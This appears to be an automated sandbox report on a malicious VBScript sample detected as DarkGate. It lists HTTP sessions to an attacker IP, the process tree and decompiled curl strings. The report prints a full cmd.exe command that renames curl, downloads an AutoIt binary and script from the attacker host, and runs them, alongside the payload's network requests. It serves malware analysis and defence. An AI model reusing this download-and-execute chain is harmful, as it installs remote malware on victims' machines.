0	192.168.2.3	49713	94.228.169.143	2351	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2023 08:02:03.007694960 CEST	119	OUT	POST /bpzszuqi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 0 Host: 94.228.169.143:2351
Sep 23, 2023 08:02:03.355653048 CEST	119	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 233 Date: Sat, 23 Sep 2023 06:02:03 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49714	94.228.169.143	2351	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2023 08:02:04.164887905 CEST	219	OUT	GET / HTTP/1.1 Host: 94.228.169.143:2351 Accept: / User-Agent: curl
Sep 23, 2023 08:02:04.489535093 CEST	220	IN	HTTP/1.1 200 OK Connection: close Content-Disposition: attachment; filename="Autoit3.exe" Content-Type: application/octet-stream Content-Length: 893608 Date: Sat, 23 Sep 2023 06:02:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49715	94.228.169.143	2351	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2023 08:02:08.213279963 CEST	1148	OUT	GET /msibpzszuqi HTTP/1.1 Host: 94.228.169.143:2351 User-Agent: curl/7.55.1 Accept: /
Sep 23, 2023 08:02:08.545937061 CEST	1148	IN	HTTP/1.1 200 OK Connection: close Content-Disposition: attachment; filename="yxAaBw.au3" Content-Type: application/octet-stream Content-Length: 930759 Date: Sat, 23 Sep 2023 06:02:08 GMT

Target ID:	1
Start time:	08:02:01
Start date:	23/09/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1.vbs"
Imagebase:	0x7ff734150000
File size:	163'840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:02:02
Start date:	23/09/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c mkdir c:\bpzs & cd /d c:\bpzs & copy c:\windows\system32\curl.exe bpzs.exe & bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi & Autoit3.exe szkzjr.au3
Imagebase:	0x7ff7c84f0000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:02:02
Start date:	23/09/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff766460000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:02:02
Start date:	23/09/2023
Path:	C:\bpzs\bpzs.exe
Wow64 process (32bit):	false
Commandline:	bpzs -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351
Imagebase:	0x7ff7f8d00000
File size:	424'448 bytes
MD5 hash:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:02:06
Start date:	23/09/2023
Path:	C:\bpzs\bpzs.exe
Wow64 process (32bit):	false
Commandline:	bpzs -o szkzjr.au3 http://94.228.169.143:2351/msibpzszuqi
Imagebase:	0x7ff7f8d00000
File size:	424'448 bytes
MD5 hash:	BDEBD2FC4927DA00EEA263AF9CF8F7ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:02:10
Start date:	23/09/2023
Path:	C:\bpzs\Autoit3.exe
Wow64 process (32bit):	true
Commandline:	Autoit3.exe szkzjr.au3
Imagebase:	0x2b0000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384641976.0000000003C78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384654045.0000000003D21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkGate_1, Description: Yara detected DarkGate, Source: 00000006.00000002.384521929.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 3%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	30.7%
Total number of Nodes:	1692
Total number of Limit Nodes:	30

Executed Functions

Function 00007FF7F8D0A162 Relevance: 158.5, APIs: 19, Strings: 71, Instructions: 1009COMMON

Download Yara Rule

APIs

_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B05D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B079
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0DB
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B0ED

Part of subcall function 00007FF7F8D0CFC4: __swprintf_l.LIBCMT ref: 00007FF7F8D0D07C
Part of subcall function 00007FF7F8D0CFC4: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0D1C7

Part of subcall function 00007FF7F8D0CFC4: __swprintf_l.LIBCMT ref: 00007FF7F8D0D126

Strings

CURLOPT_PROXY_TLSAUTH_PASSWORD, xrefs: 00007FF7F8D0A838
CURLOPT_MAIL_AUTH, xrefs: 00007FF7F8D0A95E
Metalink: fetching (%s) from (%s) FAILED (%s), xrefs: 00007FF7F8D0AF13
,, xrefs: 00007FF7F8D0A2D4
CURLOPT_FTP_ALTERNATIVE_TO_USER, xrefs: 00007FF7F8D0A3B4
CURLOPT_TFTP_NO_OPTIONS, xrefs: 00007FF7F8D0AAFA
CURLOPT_FTP_USE_PRET, xrefs: 00007FF7F8D0A5C0
@), xrefs: 00007FF7F8D0B277
', xrefs: 00007FF7F8D0A968
CURLOPT_PROXY_SERVICE_NAME, xrefs: 00007FF7F8D0A21C
CURLOPT_TFTP_BLKSIZE, xrefs: 00007FF7F8D0A525
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
CURLOPT_SSL_ENABLE_NPN, xrefs: 00007FF7F8D0A9C5
CURLOPT_MAIL_FROM, xrefs: 00007FF7F8D0A55C
http, xrefs: 00007FF7F8D0ACF2, 00007FF7F8D0AE85
Transient problem: %s Will retry in %ld seconds. %ld retries left., xrefs: 00007FF7F8D0AD57
CURLOPT_SSL_ENABLE_ALPN, xrefs: 00007FF7F8D0A9F8
CURLOPT_TCP_KEEPINTVL, xrefs: 00007FF7F8D0A4DE
CURLOPT_TCP_KEEPALIVE, xrefs: 00007FF7F8D0A473
g5, xrefs: 00007FF7F8D0AB40
CURLOPT_SASL_IR, xrefs: 00007FF7F8D0A992
CURLOPT_FTP_SSL_CCC, xrefs: 00007FF7F8D0A168
CURLOPT_TCP_KEEPIDLE, xrefs: 00007FF7F8D0A4B2
CURLOPT_HEADERDATA, xrefs: 00007FF7F8D0A6AA
CURLOPT_TLSAUTH_PASSWORD, xrefs: 00007FF7F8D0A790
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
CURLOPT_CONNECT_TO, xrefs: 00007FF7F8D0A717
CURLOPT_PROXY_SSL_OPTIONS, xrefs: 00007FF7F8D0A927
Throwing away %I64d bytes, xrefs: 00007FF7F8D0ADB6
0), xrefs: 00007FF7F8D0A68F
CURLOPT_SERVICE_NAME, xrefs: 00007FF7F8D0A254
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
curl: Saved to filename '%s', xrefs: 00007FF7F8D0ABCF
M', xrefs: 00007FF7F8D0AC68
CURLOPT_LOCALPORT, xrefs: 00007FF7F8D0A356
%s%s%s, xrefs: 00007FF7F8D0B00C
CURLOPT_ABSTRACT_UNIX_SOCKET, xrefs: 00007FF7F8D0AA48
CURLOPT_MAIL_RCPT, xrefs: 00007FF7F8D0A59A
CURLOPT_GSSAPI_DELEGATION, xrefs: 00007FF7F8D0A8A5
CURLOPT_SSL_OPTIONS, xrefs: 00007FF7F8D0A901
Metalink: fetching (%s) from (%s) FAILED (HTTP status code %ld), xrefs: 00007FF7F8D0AED2
CURLOPT_RESOLVE, xrefs: 00007FF7F8D0A6E4
CURLOPT_REDIR_PROTOCOLS, xrefs: 00007FF7F8D0A61C
failed to truncate, exiting, xrefs: 00007FF7F8D0AE2D
CURLOPT_PROXY_TLSAUTH_TYPE, xrefs: 00007FF7F8D0A870
CURLOPT_FTP_FILEMETHOD, xrefs: 00007FF7F8D0A31E
CURLOPT_PROXY_TLSAUTH_USERNAME, xrefs: 00007FF7F8D0A800
-', xrefs: 00007FF7F8D0A6B3
CURLOPT_FTP_ACCOUNT, xrefs: 00007FF7F8D0A282
CURLOPT_SSL_SESSIONID_CACHE, xrefs: 00007FF7F8D0A3ED
CURLOPT_SOCKS5_GSSAPI_NEC, xrefs: 00007FF7F8D0A1A8
+, xrefs: 00007FF7F8D0A3D1
lR, xrefs: 00007FF7F8D0AB6B
CURLOPT_FTP_SKIP_PASV_IP, xrefs: 00007FF7F8D0A2E9
CURLOPT_DEFAULT_PROTOCOL, xrefs: 00007FF7F8D0AA7D
CURLOPT_IGNORE_CONTENT_LENGTH, xrefs: 00007FF7F8D0A2B4
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
-, xrefs: 00007FF7F8D0A29F
Metalink: fetching (%s) from (%s) OK, xrefs: 00007FF7F8D0AF45
9J, xrefs: 00007FF7F8D0B09E
CURLOPT_LOCALPORTRANGE, xrefs: 00007FF7F8D0A382
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
CURLOPT_SOCKS5_AUTH, xrefs: 00007FF7F8D0A1DD
CURLOPT_HTTP_TRANSFER_DECODING, xrefs: 00007FF7F8D0A44B
CURLOPT_TLSAUTH_USERNAME, xrefs: 00007FF7F8D0A758
CURLOPT_EXPECT_100_TIMEOUT_MS, xrefs: 00007FF7F8D0AABE
CURLOPT_HTTP_CONTENT_DECODING, xrefs: 00007FF7F8D0A420
CURLOPT_UNIX_SOCKET_PATH, xrefs: 00007FF7F8D0AA59
CURLOPT_HEADERFUNCTION, xrefs: 00007FF7F8D0A667
CURLOPT_TLSAUTH_TYPE, xrefs: 00007FF7F8D0A7C8
CURLOPT_PROTOCOLS, xrefs: 00007FF7F8D0A5EE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$__swprintf_l$_close_filenofclose
String ID: %s%s%s$(%d) Failed writing body$-'$CURLOPT_ABSTRACT_UNIX_SOCKET$CURLOPT_CONNECT_TO$CURLOPT_DEFAULT_PROTOCOL$CURLOPT_EXPECT_100_TIMEOUT_MS$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_FTP_USE_PRET$CURLOPT_GSSAPI_DELEGATION$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HTTP_CONTENT_DECODING$CURLOPT_HTTP_TRANSFER_DECODING$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_LOCALPORT$CURLOPT_LOCALPORTRANGE$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_PROTOCOLS$CURLOPT_PROXY_SERVICE_NAME$CURLOPT_PROXY_SSL_OPTIONS$CURLOPT_PROXY_TLSAUTH_PASSWORD$CURLOPT_PROXY_TLSAUTH_TYPE$CURLOPT_PROXY_TLSAUTH_USERNAME$CURLOPT_REDIR_PROTOCOLS$CURLOPT_RESOLVE$CURLOPT_SASL_IR$CURLOPT_SERVICE_NAME$CURLOPT_SOCKS5_AUTH$CURLOPT_SOCKS5_GSSAPI_NEC$CURLOPT_SSL_ENABLE_ALPN$CURLOPT_SSL_ENABLE_NPN$CURLOPT_SSL_OPTIONS$CURLOPT_SSL_SESSIONID_CACHE$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_KEEPIDLE$CURLOPT_TCP_KEEPINTVL$CURLOPT_TFTP_BLKSIZE$CURLOPT_TFTP_NO_OPTIONS$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_UNIX_SOCKET_PATH$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$M'$Metalink: fetching (%s) from (%s) FAILED (%s)$Metalink: fetching (%s) from (%s) FAILED (HTTP status code %ld)$Metalink: fetching (%s) from (%s) OK$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $Throwing away %I64d bytes$Transient problem: %s Will retry in %ld seconds. %ld retries left.$curl: (%d) %s$curl: Saved to filename '%s'$failed to truncate, exiting$http$ -$'$0)$9J$@)$g5$lR$+$,
API String ID: 1288461809-2728117200
Opcode ID: ea878cc36582f55c76bbea4af61f353ac2dc4c20d7ab674798d58a685870b32f
Instruction ID: 0909a045da43daca7f723ea80158fb3db8143e12ccb33c113b163c445bf1bfa9
Opcode Fuzzy Hash: ea878cc36582f55c76bbea4af61f353ac2dc4c20d7ab674798d58a685870b32f
Instruction Fuzzy Hash: D9A2C562A0C78246EB25EB2194501B9EBA1FF4C784F840136E97D4B7D9DF3CE508E798

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D2B250 Relevance: 136.2, APIs: 18, Strings: 59, Instructions: 1432COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D2B35E

Strings

Failed sending PUT request, xrefs: 00007FF7F8D2C4CE
0, xrefs: 00007FF7F8D2C90A, 00007FF7F8D2CA21
File already completely uploaded, xrefs: 00007FF7F8D2BCB9
Content-Length:, xrefs: 00007FF7F8D2C429, 00007FF7F8D2C59E, 00007FF7F8D2C792
1.1, xrefs: 00007FF7F8D2BD8E
/, xrefs: 00007FF7F8D2BAF6
Cookie:, xrefs: 00007FF7F8D2B543
POST, xrefs: 00007FF7F8D2B434
Accept: */*, xrefs: 00007FF7F8D2BBA3
HEAD, xrefs: 00007FF7F8D2B3FC
Content-Length: 0, xrefs: 00007FF7F8D2C6EF
Could not get Content-Type header line!, xrefs: 00007FF7F8D2C6D6
%s , xrefs: 00007FF7F8D2BDC3
Host: %s%s%s, xrefs: 00007FF7F8D2B9CF
ftp://, xrefs: 00007FF7F8D2BA42
%s%s=%s, xrefs: 00007FF7F8D2C1A7
Could not seek stream, xrefs: 00007FF7F8D2BC29
Failed sending HTTP request, xrefs: 00007FF7F8D2C33F
Failed sending HTTP POST request, xrefs: 00007FF7F8D2C9E6
Referer:, xrefs: 00007FF7F8D2B4FC
Accept-Encoding:, xrefs: 00007FF7F8D2B564
Content-Range: bytes %s%I64d/%I64d, xrefs: 00007FF7F8D2BEA2
Range: bytes=%s, xrefs: 00007FF7F8D2BD39
;type=, xrefs: 00007FF7F8D2BA74
100-continue, xrefs: 00007FF7F8D2C7FF
%s, xrefs: 00007FF7F8D2B7C9
chunked, xrefs: 00007FF7F8D2B5F9
%s%s, xrefs: 00007FF7F8D2C256
Accept-Encoding: %s, xrefs: 00007FF7F8D2B5A1
Transfer-Encoding: chunked, xrefs: 00007FF7F8D2B6A9
;type=%c, xrefs: 00007FF7F8D2BB0C
Accept:, xrefs: 00007FF7F8D2BB91
%x, xrefs: 00007FF7F8D2C8BD
Expect:, xrefs: 00007FF7F8D2C7EB, 00007FF7F8D2C809
Content-Range: bytes 0-%I64d/%I64d, xrefs: 00007FF7F8D2BE78
Cookie: , xrefs: 00007FF7F8D2C183, 00007FF7F8D2C225
Host:, xrefs: 00007FF7F8D2B6DC, 00007FF7F8D2B7B2
Range:, xrefs: 00007FF7F8D2BD01
Content-Type:, xrefs: 00007FF7F8D2BB5C, 00007FF7F8D2C7C0
Content-Range: bytes %s/%I64d, xrefs: 00007FF7F8D2BEBB
Proxy-Connection:, xrefs: 00007FF7F8D2BF0B
PUT, xrefs: 00007FF7F8D2B42B
Could only read %I64d bytes from the input, xrefs: 00007FF7F8D2BCD5
User-Agent:, xrefs: 00007FF7F8D2B44C
Failed sending POST request, xrefs: 00007FF7F8D2C678, 00007FF7F8D2C726
Transfer-Encoding:, xrefs: 00007FF7F8D2B5E5, 00007FF7F8D2B603
Content-Type: application/x-www-form-urlencoded, xrefs: 00007FF7F8D2C7D4
Content-Range:, xrefs: 00007FF7F8D2BE37
1.0, xrefs: 00007FF7F8D2BD85
Referer: %s, xrefs: 00007FF7F8D2B513
OPTIONS, xrefs: 00007FF7F8D2B422
Proxy-Connection: Keep-Alive, xrefs: 00007FF7F8D2BF1F
upload completely sent off: %I64d out of %I64d bytes, xrefs: 00007FF7F8D2C3C9
ftp://%s:%s@%s, xrefs: 00007FF7F8D2BE10
GET, xrefs: 00007FF7F8D2B43D
%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 00007FF7F8D2C048
Host: %s%s%s:%hu, xrefs: 00007FF7F8D2BA1B
Chunky upload is not supported by HTTP 1.0, xrefs: 00007FF7F8D2B667
Content-Length: %I64d, xrefs: 00007FF7F8D2C440, 00007FF7F8D2C5B6, 00007FF7F8D2C7A9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free
String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%x$/$0$1.0$1.1$100-continue$;type=$;type=%c$Accept-Encoding:$Accept-Encoding: %s$Accept:$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length:$Content-Length: %I64d$Content-Length: 0$Content-Range:$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type:$Content-Type: application/x-www-form-urlencoded$Cookie:$Cookie: $Could not get Content-Type header line!$Could not seek stream$Could only read %I64d bytes from the input$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host:$Host: %s%s%s$Host: %s%s%s:%hu$OPTIONS$POST$PUT$Proxy-Connection:$Proxy-Connection: Keep-Alive$Range:$Range: bytes=%s$Referer:$Referer: %s$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent:$chunked$ftp://$ftp://%s:%s@%s$upload completely sent off: %I64d out of %I64d bytes
API String ID: 1294909896-3246751705
Opcode ID: 3e6cb406950072a1e4afd668f84cd9d1b9732f48608da7789d27830b1e806f9d
Instruction ID: a017dc3f422298261ed506c7380aee92238dfc677ee0fa8092bd765b42532880
Opcode Fuzzy Hash: 3e6cb406950072a1e4afd668f84cd9d1b9732f48608da7789d27830b1e806f9d
Instruction Fuzzy Hash: 2CE28061A0DB8281EB64EB21A4406BAE390FF497D4F844136CA7D477D5DF7CE408E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07F2C Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07F35
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07F6A
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B079
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0B2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0D0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0B0DB
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B0ED

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
Can't open '%s'!, xrefs: 00007FF7F8D080FC
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
Remote file name has no length!, xrefs: 00007FF7F8D08008
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
-, xrefs: 00007FF7F8D081A2
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
A:E, xrefs: 00007FF7F8D07F9F
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: free$_strdup$_closefclose
String ID: %s%s%s$(%d) Failed writing body$A:E$Can't open '%s'!$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $Remote file name has no length!$curl: (%d) %s$9J$@)$-
API String ID: 2572271535-565506792
Opcode ID: 1bbe6de85b5b31cc5539167f76c9fd160aedc9c46436fa533e052f6251a5530c
Instruction ID: 63a6d5ac78991f073fea61cdc80535dd6d7b38d30b8bc3fe20a2ac804576e884
Opcode Fuzzy Hash: 1bbe6de85b5b31cc5539167f76c9fd160aedc9c46436fa533e052f6251a5530c
Instruction Fuzzy Hash: C1D1B422E0D78285FB61EB61945027DE7A1EF4C784FD80035DA7E476D8DE3CE448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07C64 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E59
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E62
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E82
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07EA1

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
curl: (%d) %s, xrefs: 00007FF7F8D0AFD9
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 00007FF7F8D0AFFE
(%d) Failed writing body, xrefs: 00007FF7F8D0B08F
out of memory, xrefs: 00007FF7F8D07D12
9J, xrefs: 00007FF7F8D0B09E
More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate , xrefs: 00007FF7F8D0B005
@), xrefs: 00007FF7F8D0B277

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdupmalloc
String ID: %s%s%s$(%d) Failed writing body$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $curl: (%d) %s$out of memory$9J$@)
API String ID: 3583953570-1742031202
Opcode ID: 1a5dfdb6bc28182cc39c97a5e1452d3a960d4cb26f6decbe69135abea4f9d088
Instruction ID: b16c396b94d2bcb472043941a68ea3d175c90411a6b0f5c7510223bb74a882aa
Opcode Fuzzy Hash: 1a5dfdb6bc28182cc39c97a5e1452d3a960d4cb26f6decbe69135abea4f9d088
Instruction Fuzzy Hash: F1C1B032A0DB8285EB10EB61D44457DE7A5FF88784F940135DA7E476D8DF3CE448A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D07C6A Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E59
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E62
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D07E82
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D07EA1

Strings

%s%s%s, xrefs: 00007FF7F8D0B00C
HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure., xrefs: 00007FF7F8D0AFF7
